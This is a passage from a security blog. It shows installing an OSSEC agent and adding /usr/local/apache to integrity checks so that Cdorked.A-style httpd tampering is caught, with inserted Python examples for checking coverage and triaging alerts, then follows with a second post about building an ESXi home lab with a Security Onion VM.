This case in particular would require using something other than the default options for integrity checking because cPanel installs Apache httpd in /usr/local/apache/bin, a non-standard directory that may not be automatically included when computing file hashes and doing subsequent integrity checks.<br />
<br />
The reason I'm demonstrating OSSEC here is that it easily integrates with the Sguil console, and in Security Onion the sensors and server already have OSSEC configured to send alerts to Sguild. OSSEC also has additional functionality compared to AIDE. In this case, I'm installing the agent on a Slackware server.<br />
<pre>$ wget http://www.ossec.net/files/ossec-hids-2.7.tar.gz
---snipped---
$ openssl sha1 ossec-hids-2.7.tar.gz
SHA1(ossec-hids-2.7.tar.gz)= 721aa7649d5c1e37007b95a89e685af41a39da43
$ tar xvzf ossec-hids-2.7.tar.gz
---snipped---
$ sudo ./install.sh
OSSEC HIDS v2.7 Installation Script - http://www.ossec.net
You are about to start the installation process of the OSSEC HIDS.
You must have a C compiler pre-installed in your system.
If you have any questions or comments, please send an e-mail
to dcid@ossec.net (or daniel.cid@gmail.com).
- System: Linux webserver 3.8.4
- User: root
- Host: webserver
-- Press ENTER to continue or Ctrl-C to abort. --
1- What kind of installation do you want (server, agent, local, hybrid or help)? <b>agent</b>
- Agent(client) installation chosen.
2- Setting up the installation environment.
- Choose where to install the OSSEC HIDS [/var/ossec]:
3- Configuring the OSSEC HIDS.
3.1- What's the IP Address or hostname of the OSSEC HIDS server?: <b>192.168.1.20</b>
- Adding Server IP 192.168.1.20
3.2- Do you want to run the integrity check daemon? (y/n) [y]:
- Running syscheck (integrity check daemon).
3.3- Do you want to run the rootkit detection engine? (y/n) [y]:
- Running rootcheck (rootkit detection).
3.4 - Do you want to enable active response? (y/n) [y]:
3.5- Setting the configuration to analyze the following logs:
-- /var/log/messages
-- /var/log/auth.log
-- /var/log/syslog
-- /var/adm/syslog
-- /var/adm/auth.log
-- /var/adm/messages
-- /var/log/xferlog
-- /var/log/proftpd.log
-- /var/log/apache/error_log (apache log)
-- /var/log/apache/access_log (apache log)
-- /var/log/httpd/error_log (apache log)
-- /var/log/httpd/access_log (apache log)
- If you want to monitor any other file, just change
the ossec.conf and add a new localfile entry.
Any questions about the configuration can be answered
by visiting us online at http://www.ossec.net .
--- Press ENTER to continue ---
---snip---
- Init script modified to start OSSEC HIDS during boot.
- Configuration finished properly.
- To start OSSEC HIDS:
/var/ossec/bin/ossec-control start
- To stop OSSEC HIDS:
/var/ossec/bin/ossec-control stop
- The configuration can be viewed or modified at /var/ossec/etc/ossec.conf
Thanks for using the OSSEC HIDS.
If you have any question, suggestion or if you find any bug,
contact us at contact@ossec.net or using our public maillist at
ossec-list@ossec.net
( http://www.ossec.net/main/support/ ).
More information can be found at http://www.ossec.net
--- Press ENTER to finish (maybe more information below). ---
- You first need to add this agent to the server so they
can communicate with each other. When you have done so,
you can run the 'manage_agents' tool to import the
authentication key from the server.
/var/ossec/bin/manage_agents
More information at:
http://www.ossec.net/en/manual.html#ma</pre>
<br />
Next, I add the agent to my Security Onion server.
<br />
<pre>$ sudo /var/ossec/bin/manage_agents
****************************************
* OSSEC HIDS v2.6 Agent manager. *
* The following options are available: *
****************************************
(A)dd an agent (A).
(E)xtract key for an agent (E).
(L)ist already added agents (L).
(R)emove an agent (R).
(Q)uit.
Choose your action: A,E,L,R or Q: <b>A</b>
- Adding a new agent (use '\q' to return to the main menu).
Please provide the following:
* A name for the new agent: <b>webserver</b>
* The IP Address of the new agent: <b>192.168.1.5</b>
* An ID for the new agent[001]:
Agent information:
ID:001
Name:webserver
IP Address:192.168.1.5
Confirm adding it?(y/n): <b>y</b>
****************************************
* OSSEC HIDS v2.6 Agent manager. *
* The following options are available: *
****************************************
(A)dd an agent (A).
(E)xtract key for an agent (E).
(L)ist already added agents (L).
(R)emove an agent (R).
(Q)uit.
Choose your action: A,E,L,R or Q: <b>e</b>
Available agents:
ID: 001, Name: webserver, IP: 192.168.1.5
Provide the ID of the agent to extract the key (or '\q' to quit): <b>001</b>
Agent key information for '001' is:
---snip---
** Press ENTER to return to the main menu.</pre>
<br />
Now copy the key, go back to the web server, paste and import the key.
<br />
<pre>$ sudo /var/ossec/bin/manage_agents
****************************************
* OSSEC HIDS v2.7 Agent manager. *
* The following options are available: *
****************************************
(I)mport key from the server (I).
(Q)uit.
Choose your action: I or Q: <b>i</b>
* Provide the Key generated by the server.
* The best approach is to cut and paste it.
*** OBS: Do not include spaces or new lines.
Paste it here (or '\q' to quit): ---snip---
Agent information:
ID:001
Name:webserver
IP Address:192.168.1.5
Confirm adding it?(y/n): <b>y</b></pre>
<br />
If I were running a system with cPanel that was vulnerable to Cdorked.A then I would want to make sure OSSEC is monitoring the directories with the Apache httpd files. The OSSEC default configuration from my recent install is /var/ossec/etc/ossec.conf and the relevant lines are below:
<br />
<pre>&lt;syscheck&gt;
&lt;!-- Frequency that syscheck is executed - default to every 22 hours --&gt;
&lt;frequency&gt;79200&lt;/frequency&gt;
&lt;!-- Directories to check (perform all possible verifications) --&gt;
&lt;directories check_all="yes"&gt;/etc,/usr/bin,/usr/sbin&lt;/directories&gt;
&lt;directories check_all="yes"&gt;/bin,/sbin&lt;/directories&gt;</pre>
<br />
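A way to check whether a syscheck configuration actually covers the binaries you care about before relying on it, as an added Python example (not code from this post or from OSSEC): it reads the <directories> entries, reports which of a list of paths would not be hashed, and appends a <directories> entry for the missing tree. The config excerpt is constructed to match the default block above; the list of paths to check is an assumption, with /usr/local/apache being the cPanel location the post names.<br />
<br />
```python
"""Check which file paths an OSSEC syscheck configuration actually covers.

Added example (not part of the original post or of OSSEC): parses the
<directories> entries of an ossec.conf, reports paths that no entry covers,
and appends a <directories> entry for the missing tree.
"""
import xml.etree.ElementTree as ET
from pathlib import PurePosixPath

# Constructed excerpt modelled on the default syscheck block quoted above.
DEFAULT_SYSCHECK = """<ossec_config>
  <syscheck>
    <frequency>79200</frequency>
    <directories check_all="yes">/etc,/usr/bin,/usr/sbin</directories>
    <directories check_all="yes">/bin,/sbin</directories>
  </syscheck>
</ossec_config>
"""

# Files a cPanel host would want integrity-checked (assumed list; the
# /usr/local/apache location is the one the post names).
PATHS_TO_CHECK = [
    "/usr/bin/gcc",
    "/usr/local/apache/bin/httpd",
    "/usr/local/apache/modules",
]


def _parse(config_text):
    # A real ossec.conf may hold several top-level <ossec_config> blocks,
    # which is not well-formed XML on its own, so wrap it before parsing.
    return ET.fromstring("<wrapper>" + config_text + "</wrapper>")


def monitored_directories(config_text):
    """Return every directory listed in any <directories> element."""
    dirs = []
    for el in _parse(config_text).iter("directories"):
        dirs.extend(d.strip() for d in (el.text or "").split(",") if d.strip())
    return dirs


def is_covered(path, dirs):
    """True if path equals or lies under one of the monitored directories."""
    p = PurePosixPath(path)
    return any(PurePosixPath(d) == p or PurePosixPath(d) in p.parents for d in dirs)


def uncovered(config_text, paths):
    """Paths from `paths` that syscheck would not hash with this config."""
    dirs = monitored_directories(config_text)
    return [p for p in paths if not is_covered(p, dirs)]


def add_directories(config_text, new_dirs, check_all=True):
    """Return the config with one more <directories> entry in the first <syscheck>."""
    wrapper = _parse(config_text)
    syscheck = wrapper.find(".//syscheck")
    if syscheck is None:
        raise ValueError("no <syscheck> block in configuration")
    el = ET.SubElement(syscheck, "directories", check_all="yes" if check_all else "no")
    el.text = ",".join(new_dirs)
    # Serialise the original top-level blocks without the wrapper element.
    return "\n".join(ET.tostring(child, encoding="unicode") for child in wrapper)


if __name__ == "__main__":
    print("not monitored by default:", uncovered(DEFAULT_SYSCHECK, PATHS_TO_CHECK))
    fixed = add_directories(DEFAULT_SYSCHECK, ["/usr/local/apache"])
    print("after adding /usr/local/apache:", uncovered(fixed, PATHS_TO_CHECK))
```
<br />
Running it against the default block reports both /usr/local/apache paths as unmonitored and an empty list once /usr/local/apache is added; the same check is worth running after any change to ossec.conf, since a typo in a comma-separated directory list silently drops coverage rather than failing.<br />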
So by default OSSEC would apparently not be checking the integrity of cPanel's Apache installation and I would need to add /usr/local/apache to the directory checks. After making any changes for my particular system, I check the status of OSSEC and it is not yet running.
<br />
<pre>$ sudo /etc/rc.d/rc.ossec status
ossec-logcollector not running...
ossec-syscheckd not running...
ossec-agentd not running...
ossec-execd not running...
$ sudo /etc/rc.d/rc.ossec start
Starting OSSEC HIDS v2.7 (by Trend Micro Inc.)...
Started ossec-execd...
Started ossec-agentd...
Started ossec-logcollector...
Started ossec-syscheckd...
Completed.</pre>
<br />
Note that after adding the OSSEC agent on the remote system and then adding it on the OSSEC server, you must restart ossec-hids-server so that the ossec-remoted process starts listening on 1514/udp for remote agents.
<br />
<pre>$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
<b>ossec-remoted not running...</b>
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
$ sudo /etc/init.d/ossec-hids-server restart
Killing ossec-monitord ..
Killing ossec-logcollector ..
ossec-remoted not running ..
Killing ossec-syscheckd ..
Killing ossec-analysisd ..
ossec-maild not running ..
Killing ossec-execd ..
OSSEC HIDS v2.6 Stopped
Starting OSSEC HIDS v2.6 (by Trend Micro Inc.)...
<b>OSSEC analysisd: Testing rules failed. Configuration error. Exiting.</b>
2013/04/30 23:13:59 ossec-maild: INFO: E-Mail notification disabled. Clean Exit.
Started ossec-maild...
Started ossec-execd...
Started ossec-analysisd...
Started ossec-logcollector...
Started ossec-remoted...
Started ossec-syscheckd...
Started ossec-monitord...
Completed.
$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
<b>ossec-remoted is running...</b>
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
$ netstat -l | grep 1514
udp 0 0 *:1514 *:* </pre>
<br />
Note the error corresponding to the FAQ entry <a href="http://www.ossec.net/doc/faq/ossec.html#i-m-getting-an-error-when-starting-ossec-ossec-analysisd-testing-rules-failed-configuration-error-exiting-why">about getting an error when starting OSSEC</a>. However, since I'm running OSSEC 2.7 this did not seem to apply. Poking around, I realized the ossec-logtest executable had not been copied to /var/ossec/bin when I ran the install script. After I manually copied it to the directory, restarting OSSEC no longer caused the "Testing rules failed" error.<br />
<br />
Once you have installed OSSEC on the system to be monitored, added the agent on the server, imported the key on the system to be monitored, restarted the server process, and started the client process, you will start getting alerts from the newly added system in Sguil. For example, the content of Sguil alerts will look like this after updating gcc:
<br />
<pre>Integrity checksum changed for: '/usr/bin/gcc'
Old md5sum was: '764a405824275d806ab5c441516b2d79'
New md5sum is : '6ab74628cd8a0cdf84bb3329333d936e'
Old sha1sum was: '230a4c09010f9527f2b3d6e25968d5c7c735eb4e'
New sha1sum is : 'b931ceb76570a9ac26f86c12168b109becee038b'</pre>
<br />
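Turning an alert body like the one above into a triage decision, as an added Python example that is not code from this post, Sguil or OSSEC: it parses the integrity-change text into its fields and compares the new SHA-1 with a list of hashes the administrator recorded for files they deliberately installed or updated. The gcc alert is the one quoted above; the httpd alert and the known-good manifest are constructed, and treating the post's new gcc hash as the value the update shipped is an assumption made for the illustration.<br />
<br />
```python
"""Parse OSSEC integrity-change alert bodies and triage them against known-good hashes.

Added example, not code from the post, Sguil or OSSEC. The alert text format is
the one shown in the post; the known-good manifest is constructed sample data.
"""
import re

# One regex over the five-line body; \s* tolerates the line breaks between fields.
ALERT_RE = re.compile(
    r"Integrity checksum changed for: '(?P<path>[^']+)'\s*"
    r"Old md5sum was: '(?P<old_md5>[0-9a-f]{32})'\s*"
    r"New md5sum is : '(?P<new_md5>[0-9a-f]{32})'\s*"
    r"Old sha1sum was: '(?P<old_sha1>[0-9a-f]{40})'\s*"
    r"New sha1sum is : '(?P<new_sha1>[0-9a-f]{40})'"
)

# The gcc alert body quoted in the post.
GCC_ALERT = """Integrity checksum changed for: '/usr/bin/gcc'
Old md5sum was: '764a405824275d806ab5c441516b2d79'
New md5sum is : '6ab74628cd8a0cdf84bb3329333d936e'
Old sha1sum was: '230a4c09010f9527f2b3d6e25968d5c7c735eb4e'
New sha1sum is : 'b931ceb76570a9ac26f86c12168b109becee038b'"""

# Constructed alert for the cPanel httpd path; the hashes are made up.
HTTPD_ALERT = """Integrity checksum changed for: '/usr/local/apache/bin/httpd'
Old md5sum was: '00000000000000000000000000000001'
New md5sum is : '00000000000000000000000000000002'
Old sha1sum was: '0000000000000000000000000000000000000001'
New sha1sum is : '0000000000000000000000000000000000000002'"""

# Constructed known-good manifest: SHA-1 values recorded for files the
# administrator deliberately installed. The gcc entry assumes the post's new
# hash is the one the gcc update shipped; the httpd entry is the pre-change hash.
KNOWN_GOOD_SHA1 = {
    "/usr/bin/gcc": {"b931ceb76570a9ac26f86c12168b109becee038b"},
    "/usr/local/apache/bin/httpd": {"0000000000000000000000000000000000000001"},
}


def parse_alert(body):
    """Return the alert's fields as a dict, or None if it is not an integrity alert."""
    m = ALERT_RE.search(body)
    return m.groupdict() if m else None


def triage(body, manifest=KNOWN_GOOD_SHA1):
    """Classify an OSSEC alert body.

    'not_integrity_alert' - body is some other OSSEC alert type
    'expected_update'     - new hash matches a recorded known-good value
    'unexpected_change'   - file is tracked but the new hash is not known good
    'unknown_file'        - file is not in the manifest at all
    """
    fields = parse_alert(body)
    if fields is None:
        return "not_integrity_alert"
    good = manifest.get(fields["path"])
    if good is None:
        return "unknown_file"
    return "expected_update" if fields["new_sha1"] in good else "unexpected_change"


if __name__ == "__main__":
    for body in (GCC_ALERT, HTTPD_ALERT, "[OSSEC] Web server 400 error code."):
        fields = parse_alert(body)
        print((fields or {}).get("path", "-"), "->", triage(body))
```
<br />
The manifest is what makes the difference between an expected package update and a replaced httpd; with the same alert text, the gcc change is classified as expected and the httpd change as unexpected, which is the distinction an analyst otherwise has to make by hand for every checksum alert.<br />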
In the Sguil console, if I wanted to view all the recent OSSEC alerts I could perform a query as pictured below. Note you need to escape the brackets or remove them in favor of the MySQL wildcards '%%'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3sWyzg0lJUdj2nnlg1o0xaAdAHybcPKnbzhdX15xd74VfBaRPFl03nHGoO6iNqW1icV30BClFZZHwpfNtJSHlPfWq_H0f1cXkKXmW8bySqvHUeLnUGJ8iAMwNgdWfao_tYloLypO5qEhc/s1600/ossec-query.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3sWyzg0lJUdj2nnlg1o0xaAdAHybcPKnbzhdX15xd74VfBaRPFl03nHGoO6iNqW1icV30BClFZZHwpfNtJSHlPfWq_H0f1cXkKXmW8bySqvHUeLnUGJ8iAMwNgdWfao_tYloLypO5qEhc/s400/ossec-query.png" width="400" /></a></div>
<br />
Finally, to show an example of the various types of alerting that OSSEC can do in addition to checksum changes, here is a query and output directly from the MySQL console.
<br />
<pre>mysql> SELECT count(signature),signature FROM event WHERE signature LIKE '%%OSSEC%%' GROUP BY signature ORDER BY count(signature) DESC;
+------------------+---------------------------------------------------------------------------------------+
| count(signature) | signature                                                                             |
+------------------+---------------------------------------------------------------------------------------+
|              388 | [OSSEC] Integrity checksum changed.                                                   |
|              149 | [OSSEC] Host-based anomaly detection event (rootcheck).                               |
|               46 | [OSSEC] Integrity checksum changed again (2nd time).                                  |
|               39 | [OSSEC] IP Address black-listed by anti-spam (blocked).                               |
|               12 | [OSSEC] Integrity checksum changed again (3rd time).                                  |
|                4 | [OSSEC] Web server 400 error code.                                                    |
|                3 | [OSSEC] Receipent address must contain FQDN (504: Command parameter not implemented). |
+------------------+---------------------------------------------------------------------------------------+
7 rows in set (0.00 sec)</pre>
The highest count alert, plus the alerts indicating "2nd time" and "3rd time", are the basic functionality needed to detect changes to a file, my original use case. The "rootcheck" is alerting on files owned by root but writable by everyone. The balance of the alerts are from reading the system logs and detecting the system rejecting emails (anti-spam, 504) or web server error codes.<br />
<br />
Back to the original problem of Cdorked.A, the blog posts on the subject also indicate that NSM could detect unusually long HTTP sessions, and there are no doubt other network behaviors that could be used to create signatures or network analytics resulting in detection. File integrity checks are just one possible way to detect a compromised server. Remember you need to have known good checksums for this to work! You ideally install something like OSSEC prior to the system being live on the network or at the least prior to it running any listening services that could be compromised before computing the checksums.<br />
<br />
<h3>
Home Lab Part 2: VMware ESXi, Security Onion, and More</h3>
Posted by Nathaniel Richmond, 2013-04-22<br />
<br />
As I stated in my <a href="http://eatingsecurity.blogspot.com/2013/04/new-home-lab-configuration.html" target="_blank">previous post</a> about a new home lab configuration, I decided to try VMware ESXi 5.1 on my new Shuttle SH67H. ESXi is free for uses like this, presumably because it clearly benefits VMware if professionals can use it in a lab setting and that encourages use of their paid products in production. I have seen some conflicting accounts, but it appears that the main limit on the free version of ESXi 5.1 is 32GB of RAM.<br />
<br />
I won't go into too much detail about the installation since it is adequately covered by a couple of other posts I found prior to purchasing my system.<br />
<ul>
<li><a href="http://www.ryanbirk.com/the-perfect-vmware-vsphere-5-homelab" target="_blank">The Perfect VMware vSphere 5 Home Lab</a></li>
<li><a href="http://rsts11.wordpress.com/2012/03/13/rsts11-building-my-compact-vmware-server-at-home/" target="_blank">Building my compact VMware server at home</a></li>
</ul>
I will mainly cover details that stood out and things I discovered as someone new to ESXi.<br />
<br />
I had already planned to get a Shuttle for the small form factor, low noise, and low power usage. Finding out that the SH67H could be used as a <a href="http://en.wikipedia.org/wiki/White_box_(computer_hardware)" target="_blank">white box</a> for ESXi made it easy to pick an initial project once I built the system. (Okay, we could quibble over whether a Shuttle counts as a white box). Additionally, since my previous home network sensor running Sguil had died, I figured that the first VM to build would be Security Onion but that I'd still be able to run multiple other VMs without impacting my home lab NSM.<br />
<br />
Getting ESXi installed on the Shuttle was pretty simple. After booting to CD, I just followed the prompts and made sane choices. The one thing to note is that I installed ESXi to an external USB flash drive. Since the OS is so small, it gets loaded primarily to RAM at boot anyway. Using a flash drive has some advantages and some disadvantages, as shown in many discussions on the VMware and other discussion boards. For my home lab I decided to install to the flash drive, but chances are that it will actually make no difference to me. Some ESXi servers have no local storage, so I imagine it is particularly common for those systems to use a USB flash drive.<br />
<br />
After using a directly connected keyboard and monitor, I moved the system into my home "server closet" and booted it headless. I installed the vSphere Client on my local Windows VM since I don't have a non-VM Windows installation. The vSphere Client was surprisingly easy and I might even go as far as to call it user-friendly. You can see in the screenshot below that it is relatively straightforward.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8kMtJfa5x0Tlp5Dnbq0HWRsMYMsGBGZgzmZzbvogLu1kwGUcVtWz1URHCb_Ru8D2di42l9-pRZLQy0NF-KUzWjWg7HLvFdQ1PjP9HK64VMUc30H4_Tpm8nDtmL5qeyRqJHR451pt_IOnq/s1600/esxi.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8kMtJfa5x0Tlp5Dnbq0HWRsMYMsGBGZgzmZzbvogLu1kwGUcVtWz1URHCb_Ru8D2di42l9-pRZLQy0NF-KUzWjWg7HLvFdQ1PjP9HK64VMUc30H4_Tpm8nDtmL5qeyRqJHR451pt_IOnq/s640/esxi.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The error states "System logs on host vmshuttle are stored on non-persistent storage."</td></tr>
</tbody></table>
The first thing I noticed was, because of installing ESXi to the flash drive, I got the error shown in my screenshot.<br />
<br />
This error was only temporary. I am not sure when it was resolved, most likely after a reboot or I created the initial guest VM, but the system created a ".locker" directory in which I can clearly see all the logs. I am assuming they are persistent since vmstore0 is the internal 1TB hard drive, not the USB flash drive.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># cd /vmfs/volumes/vmstore0/<br />
# ls -l .locker/<br />
drwxr-xr-x 1 root root 280 Apr 7 16:01 core<br />
drwxr-xr-x 1 root root 280 Apr 7 16:01 downloads<br />
drwxr-xr-x 1 root root 4340 Apr 16 02:15 log<br />
drwxr-xr-x 1 root root 420 Apr 7 16:01 var</span>
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
I believe another option for fixing the error would be to manually set the scratch partition as detailed in <a href="http://kb.vmware.com/kb/1033696" target="_blank">VMware's Knowledge Base</a>. Note that I haven't actually tried that to date.<br />
<br />
Before being able to SSH into the ESXi host and look at the above directories and files, I had to enable SSH. The configuration for SSH and a number of other security-related services is available in vSphere by highlighting the host (since in the workplace you may use vSphere to manage multiple ESXi systems), then going to the Configuration tab, Security Profile, and finally SSH Properties. If you haven't noticed already, ESXi defaults to using root for everything. I haven't yet investigated the feasibility of locking down the ESXi host, but I think it's safe to say most people will rely on keeping the host as isolated as possible since the host OS is not particularly flexible or configurable outside options VMware provides.<br />
<br />
I decided the best way to use vSphere would be to copy my Windows 7 VM from my laptop to the ESXi host. Trying to scp the VM then adding it to the inventory never worked properly. I had similar problems when trying to scp a CentOS VM from my laptop. When I tried browsing the datastore in vSphere and adding a local machine to the remote inventory, it would get partway through and then fail with an I/O error. I believe this was all actually a case of a flaky wireless access point, but even in cases where I successfully copied the CentOS VM I got errors when trying to add it to the inventory.<br />
<br />
I eventually got it to work by converting the VM locally using <a href="http://www.vmware.com/support/developer/ovf/" target="_blank">ovftool</a> then deploying it to ESXi. OVF is the Open Virtualization Format, an open standard for packaging virtual machines. The syntax to convert an existing VM is simple. First, make sure the VM is powered down rather than just paused. On OSX running VMware Fusion, you can export a VM easily.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ nr$ cd /Applications/VMware\ Fusion.app/Contents/Library/VMware\ OVF\ Tool/ovftool</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ nr$ ./ovftool -dm=thin ~/Documents/Virtual\ Machines.localized/Windows\ 7\ x64.vmwarevm/Windows\ 7\ x64.vmx ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf</span><br />
<br />
After the conversion, the VM still needed to be exported to the ESXi host. I plugged my laptop into a wired connection to speed the process and eliminate any issues I was having over wireless, then sent the VM to ESXi. The options I used are to set the datastore, disk mode, and network.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ nr$ ./ovftool -ds=vmstore0 -dm=thin --network="VM Network 2" ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf vi://192.168.1.10/</span><br />
<br />
Once the VM is copied to the host, you will need to browse the datastore and add the VM to the ESXi inventory. Other ways to move a VM to ESXi are not endorsed by VMware. They <a href="http://kb.vmware.com/kb/2034095" target="_blank">officially recommend</a> using OVF to import VMs.<br />
<br />
All things considered, getting ESXi installed and configured was relatively easy. There are certainly drawbacks to using unsupported hardware. For example, vSphere does not display CPU temperature and other health or status information. I believe ESXi expects to use <a href="http://en.wikipedia.org/wiki/Ipmi" target="_blank">IPMI</a> for hardware status like voltages, temperatures, and more. There are options to consider for anyone wanting a home lab using supported hardware. VMware maintains a lengthy <a href="http://www.vmware.com/resources/compatibility/search.php" target="_blank">HCL</a> and I presume systems on their list support all the health status information in vSphere. I did find several possibilities to buy used servers like a Dell PowerEdge 2950 at reputable sites for about $650. Since I didn't want the noise, don't have a rack, and may not keep the system as a dedicated ESXi host, I did not go that route for a lab system.<br />
<br />
<h3>
Building a Security Onion VM</h3>
<br />
As stated, the first VM I built was Security Onion. I did this through the vSphere client and include some screenshots here. Most of this applies to building any VM using vSphere.<br />
<br />
After choosing the option to create a new VM, I selected a custom configuration. I named the VM simply "Security Onion" and chose my only datastore, vmstore0, as the storage location. I am not concerned with backwards compatibility, so chose "Virtual Machine Version 8." I chose only one core and one socket for the CPU, but allocated 4GB of RAM since I knew the combination of Suricata, Bro, and other monitoring processes would eat a lot of RAM. I was installing 64-bit, so I chose 64-bit Ubuntu as the Linux version.
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiESowXe_nWFkDnuGqDooD0uSnPz1-3vuypBij1FWkNpW-qibXqABBT5ghMyEUIf_kL_sCHTYn_ZRTaVrbx8IR2_YfJPYje2Gq1B4oLa6lqmJ-JoyksHdUbB69mhKoPmx_VWQlBvrIaXhWu/s1600/Screen+Shot+2013-04-03+at+20.41.40+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiESowXe_nWFkDnuGqDooD0uSnPz1-3vuypBij1FWkNpW-qibXqABBT5ghMyEUIf_kL_sCHTYn_ZRTaVrbx8IR2_YfJPYje2Gq1B4oLa6lqmJ-JoyksHdUbB69mhKoPmx_VWQlBvrIaXhWu/s400/Screen+Shot+2013-04-03+at+20.41.40+PM.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Choosing the number of NICs, network, and<br />
adapter to use when initially configuring the VM</td></tr>
</tbody></table>
I selected two NICs both using <a href="http://kb.vmware.com/kb/1001805" target="_blank">VMXNET 3</a>, which was probably the first non-standard selection in my custom configuration. I wanted to make sure I had separate management and promiscuous mode NICs since this will be a sensor. The option for VMXNET 3 should not be available as a choice if you previously selected an OS that doesn't support it when you created the VM.<br />
<br />
I next chose the LSI Logic SAS for the SCSI Controller. Although I think it won't matter for Ubuntu, note the following from VMware's local help files.
<br />
<blockquote class="tr_bq">
"The LSI Logic Parallel adapter and the LSI Logic SAS adapter offer equivalent performance. Some guest operating system vendors are phasing out support for parallel SCSI in favor of SAS, so if your virtual machine and guest operating system support SAS, choose LSI SAS to maintain future compatibility."</blockquote>
This is a good time to point out that hitting the "Help" button in vSphere will open the local help files in your browser, and they contain actual useful information about the differences in choices when configuring the VM. In the case of the help button during the process of creating a new VM, it will actually open the specific page that is contextually useful for the options on the current step of the process. In general, both their help files and the Knowledge Base seem quite useful.<br />
<br />
Finally, I created the virtual disk. This includes deciding whether to thin provision, thick provision lazy zeroed, or thick provision eager zeroed, meaning prepare the disk ahead of time. The documentation states that eager zeroed supports clustering for fault tolerance. I chose thick provisioned for my Security Onion since I knew with certainty that the virtual disk would get filled with NSM data like packet captures and logs. There are a number of KB and blog posts on the VMware site that detail advantages and disadvantages of the different provisioning methods.
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm2IqCHIjghmI7IVwNJpVx5fJHQKAgCzjzkMzziWK5vCL77fdgtkfuBOn3UjtR-tzgRpWCyj8Ioa_vYg5k-1XNISUM5thsRk7r-IhltpJHt7WTgPqDKM8s_6qSiynrwbYNZ2UBp1YqF0FX/s1600/Screen+Shot+2013-04-03+at+20.47.17+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="381" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm2IqCHIjghmI7IVwNJpVx5fJHQKAgCzjzkMzziWK5vCL77fdgtkfuBOn3UjtR-tzgRpWCyj8Ioa_vYg5k-1XNISUM5thsRk7r-IhltpJHt7WTgPqDKM8s_6qSiynrwbYNZ2UBp1YqF0FX/s400/Screen+Shot+2013-04-03+at+20.47.17+PM.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The final settings for my Security Onion VM</td></tr>
</tbody></table>
<br />
Once the VM was configured on ESXi, I still needed to actually install Security Onion. You can do it the old-fashioned way by burning a disc and using the CD/DVD drive, but I mounted the ISO instead. To do this, you just need to start the VM, which doesn't yet have an OS, then open a console in vSphere and click the button to mount the ISO in the virtual CD drive so it will boot to the disc image and start the installation process. The vSphere console is a similar view and interface to Fusion or Workstation and mounting the ISO works essentially the same way.<br />
<br />
The time it took from hitting the button to create a VM to the time I had a running Security Onion sensor was quite short. I had a couple small problems after the initial installation. First, in ESXi you have to manually go to the NIC settings and check a box that allows it to sniff all the traffic. My sniffing interface was initially not seeing the traffic when I checked with tcpdump, which made me realize it was probably not yet in promiscuous mode.<br />
<br />
Second, the 4GB RAM and one CPU I had initially allocated was insufficient. When the sensor was running and I tried to update Ubuntu, the system became very unresponsive. I eventually doubled the RAM to 8GB and the number of cores to two, which resolved the issue. I think at this point that I could probably actually drop back down to 4GB of RAM, but since the system has 32GB I don't need to worry about it yet.
<br />
<br />
<h3>
Other ESXi Notes</h3>
<br />
Although ESXi is stripped pretty bare of common Linux utilities and commands, there is plenty you can do from a command line through SSH instead of using vSphere. For example, to list all VMs on the system, <a href="http://kb.vmware.com/kb/1038043" target="_blank">power on</a> my Windows 7 VM, and find the IP address so I can connect through RDP:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"># vim-cmd vmsvc/getallvms</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Vmid Name File Guest OS Version Annotation</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1 Security Onion [vmstore0] Security Onion/Security Onion.vmx ubuntu64Guest vmx-08 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">13 Windows 7 x64 [vmstore0] Windows 7 x64/Windows 7 x64.vmx windows7_64Guest vmx-09 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6 CentOS 64-bit [vmstore0] CentOS 64-bit/CentOS 64-bit.vmx centos64Guest vmx-08 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ # vim-cmd vmsvc/power.on 13</span><br />
